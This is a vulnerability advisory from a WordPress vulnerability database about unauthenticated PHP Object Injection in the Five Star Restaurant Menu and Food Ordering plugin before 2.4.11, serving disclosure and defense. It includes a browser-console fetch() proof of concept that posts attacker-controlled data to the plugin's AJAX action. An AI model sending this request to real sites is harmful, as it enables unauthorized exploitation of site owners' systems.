Lucene search

K
wpvulndbKrzysztof Zając (CERT PL)WPVDB-ID:91A5847A-62E7-4B98-A554-5EECB6A06E5B
HistoryOct 27, 2023 - 12:00 a.m.

Five Star Restaurant Menu and Food Ordering < 2.4.11 - Unauthenticated PHP Object Injection

2023-10-2700:00:00
Krzysztof Zając (CERT PL)
wpscan.com
2
unauthenticated users
php object injection
ajax action
vulnerability
five star restaurant menu

6.8 Medium

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

60.8%

Description The plugin unserializes user input via an AJAX action available to unauthenticated users, allowing them to perform PHP Object Injection when a suitable gadget is present on the blog.

PoC

Run the below command in the developer console of the web browser while being on the blog unauthenticated fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded” }, “body”: new URLSearchParams({“action”: “fdm_update_cart_item”, “options”: “data-to-unserialize”}), “method”: “POST”, “credentials”: “include” });

CPENameOperatorVersion
eq2.4.11

6.8 Medium

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

60.8%

Related for WPVDB-ID:91A5847A-62E7-4B98-A554-5EECB6A06E5B